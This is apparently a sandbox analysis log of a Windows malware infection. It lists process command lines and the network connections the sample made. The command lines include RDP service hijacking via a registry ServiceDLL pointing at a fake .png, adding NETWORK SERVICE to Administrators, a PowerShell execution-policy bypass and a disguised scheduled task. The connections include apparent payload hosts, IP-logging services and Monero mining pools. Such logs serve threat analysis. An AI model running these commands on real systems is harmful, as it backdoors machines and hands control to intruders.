"C:\Windows\System32\cmd.exe" /c taskkill /im 9F21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9F21.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im 9F21.exe /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CC3D.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yglm3hcs\yglm3hcs.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES486F.tmp" "c:\Users\Admin\AppData\Local\Temp\yglm3hcs\CSC6188B91267ED457FACD8164C64C2484.TMP"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -Embedding

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\SLUI.exe

"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s seclogon

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\cheugba

C:\Users\Admin\AppData\Roaming\cheugba

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\cheugba

C:\Users\Admin\AppData\Roaming\cheugba

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\cheugba

C:\Users\Admin\AppData\Roaming\cheugba

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 104.21.87.76:80 hsiens.xyz tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 a.goatgame.co udp
US 172.67.146.70:443 a.goatgame.co tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 startupmart.bar udp
US 172.67.211.161:443 startupmart.bar tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 wheelllc.bar udp
US 104.21.64.202:443 wheelllc.bar tcp
US 8.8.8.8:53 qwertys.info udp
US 104.21.20.198:443 qwertys.info tcp
US 172.67.211.161:443 startupmart.bar tcp
US 8.8.8.8:53 yelty.info udp
US 104.21.17.186:443 yelty.info tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 google.vrthcobj.com udp
US 8.8.8.8:53 google.vrthcobj.com udp
JP 34.97.69.225:53 google.vrthcobj.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 liveme31.com udp
US 172.67.132.120:80 liveme31.com tcp
US 208.95.112.1:80 ip-api.com tcp
SC 185.215.113.104:18754 tcp
US 8.8.8.8:53 downloadlog.com udp
RU 188.119.65.241:80 downloadlog.com tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
SC 185.215.113.104:18754 tcp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 real-web-online.bar udp
US 104.21.74.148:443 real-web-online.bar tcp
US 8.8.8.8:53 phonefix.bar udp
US 104.21.10.67:443 phonefix.bar tcp
US 104.21.10.67:443 phonefix.bar tcp
RU 45.9.20.20:13441 tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 live.goatgame.live udp
US 172.67.222.125:443 live.goatgame.live tcp
US 8.8.8.8:53 nopedope1.com udp
US 104.21.6.118:80 nopedope1.com tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 151.139.128.14:80 crl.comodoca.com tcp
N/A 127.0.0.1:49724 tcp
US 151.139.128.14:80 crl.comodoca.com tcp
N/A 127.0.0.1:49726 tcp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 a.upstloans.net udp
US 172.67.179.248:443 a.upstloans.net tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 8.8.8.8:53 www.mhmvc.xyz udp
RU 188.225.87.175:80 www.mhmvc.xyz tcp
US 8.8.8.8:53 maf-pub.com udp
US 104.21.91.222:80 maf-pub.com tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 primods.com udp
RU 188.119.65.241:80 primods.com tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 google.com udp
NL 142.250.179.132:80 www.google.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 162.0.210.44:443 connectini.net tcp
US 172.67.179.248:443 a.upstloans.net tcp
US 8.8.8.8:53 b.upstloans.net udp
US 172.67.179.248:443 b.upstloans.net tcp
US 172.67.179.248:443 b.upstloans.net tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
US 172.67.179.248:443 b.upstloans.net tcp
US 162.0.210.44:443 connectini.net tcp
UA 194.145.227.159:80 194.145.227.159 tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 shellloader.com udp
RU 45.132.17.116:80 shellloader.com tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 172.67.148.61:443 source3.boys4dayz.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 aa.goatgamea.com udp
US 104.21.62.66:443 aa.goatgamea.com tcp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
US 8.8.8.8:53 bb.goatgamed.com udp
US 104.21.30.211:443 bb.goatgamed.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 a.goatgame.co udp
US 104.21.79.144:443 a.goatgame.co tcp
RU 188.119.65.241:80 primods.com tcp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 venetrigni.com udp
US 3.209.145.5:443 venetrigni.com tcp
US 3.209.145.5:443 venetrigni.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 sanctam.net udp
SE 185.65.135.234:58899 sanctam.net tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 varmisende.com udp
PK 124.109.61.160:80 varmisende.com tcp
US 8.8.8.8:53 fernandomayol.com udp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 51.255.34.79:14433 xmr-eu2.nanopool.org tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 pastebin.com udp
US 104.23.98.190:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.83.33.228:14433 xmr-eu1.nanopool.org tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 telete.in udp
DE 195.201.225.248:443 telete.in tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 tuzlacastajanslari.bykmedya.com udp
TR 31.192.214.222:80 tuzlacastajanslari.bykmedya.com tcp
MD 5.181.156.77:80 5.181.156.77 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 htagzdownload.pw udp
DE 144.76.183.53:63565 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 fernandomayol.com udp
MX 201.124.70.40:80 fernandomayol.com tcp
US 8.8.8.8:53 jaliemaval.xyz udp
RU 95.213.165.250:80 jaliemaval.xyz tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
MX 201.124.70.40:80 fernandomayol.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 htagzdownload.pw udp
DE 195.201.225.248:443 telete.in tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
MD 5.181.156.77:80 5.181.156.77 tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 real-web-online.bar udp
US 104.21.74.148:443 real-web-online.bar tcp
US 8.8.8.8:53 phonefix.bar udp
US 172.67.131.66:443 phonefix.bar tcp
US 172.67.131.66:443 phonefix.bar tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 config.teams.microsoft.com udp
US 52.113.194.132:443 config.teams.microsoft.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 venetrigni.com udp
US 3.209.145.5:443 venetrigni.com tcp
US 3.209.145.5:443 venetrigni.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 best-protection4.me udp
US 104.21.82.246:443 best-protection4.me tcp
US 104.21.82.246:443 best-protection4.me tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.bing.com udp
US 131.253.33.200:443 www.bing.com tcp
US 131.253.33.200:443 www.bing.com tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
US 8.8.8.8:53 kimoangel.info udp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 151.139.128.14:80 crl.usertrust.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
NL 65.9.83.86:443 images.scanalert.com tcp
NL 65.9.83.86:443 images.scanalert.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 63.32.159.255:443 dpm.demdex.net tcp
IE 63.32.159.255:443 dpm.demdex.net tcp
US 8.8.8.8:53 s.go-mpulse.net udp
NL 104.80.224.132:443 s.go-mpulse.net tcp
NL 104.80.224.132:443 s.go-mpulse.net tcp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 mcafee12.tt.omtrdc.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 54.244.27.30:443 mcafee12.tt.omtrdc.net tcp
US 54.244.27.30:443 mcafee12.tt.omtrdc.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 684dd30c.akstat.io udp
NL 104.80.224.132:443 684dd30c.akstat.io tcp
NL 104.80.224.132:443 684dd30c.akstat.io tcp
US 8.8.8.8:53 trial-eum-clienttons-s.akamaihd.net udp
US 8.8.8.8:53 trial-eum-clientnsv4-s.akamaihd.net udp
NL 23.209.125.83:443 trial-eum-clienttons-s.akamaihd.net tcp
NL 23.209.125.83:443 trial-eum-clienttons-s.akamaihd.net tcp
NL 104.109.143.146:443 trial-eum-clientnsv4-s.akamaihd.net tcp
NL 104.109.143.146:443 trial-eum-clientnsv4-s.akamaihd.net tcp
US 8.8.8.8:53 ti6uom3inwhzeyj5c3qa-puqt5l-bf7380970-clientnsv4-s.akamaihd.net udp
NL 104.109.143.146:443 ti6uom3inwhzeyj5c3qa-puqt5l-bf7380970-clientnsv4-s.akamaihd.net tcp
NL 104.109.143.146:443 ti6uom3inwhzeyj5c3qa-puqt5l-bf7380970-clientnsv4-s.akamaihd.net tcp
NL 23.209.125.83:443 trial-eum-clienttons-s.akamaihd.net tcp
NL 23.209.125.83:443 trial-eum-clienttons-s.akamaihd.net tcp
US 8.8.8.8:53 tags.tiqcdn.com udp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
US 8.8.8.8:53 c.evidon.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
DE 23.45.239.236:443 c.evidon.com tcp
DE 23.45.239.236:443 c.evidon.com tcp
DE 23.45.239.236:443 c.evidon.com tcp
US 8.8.8.8:53 l.evidon.com udp
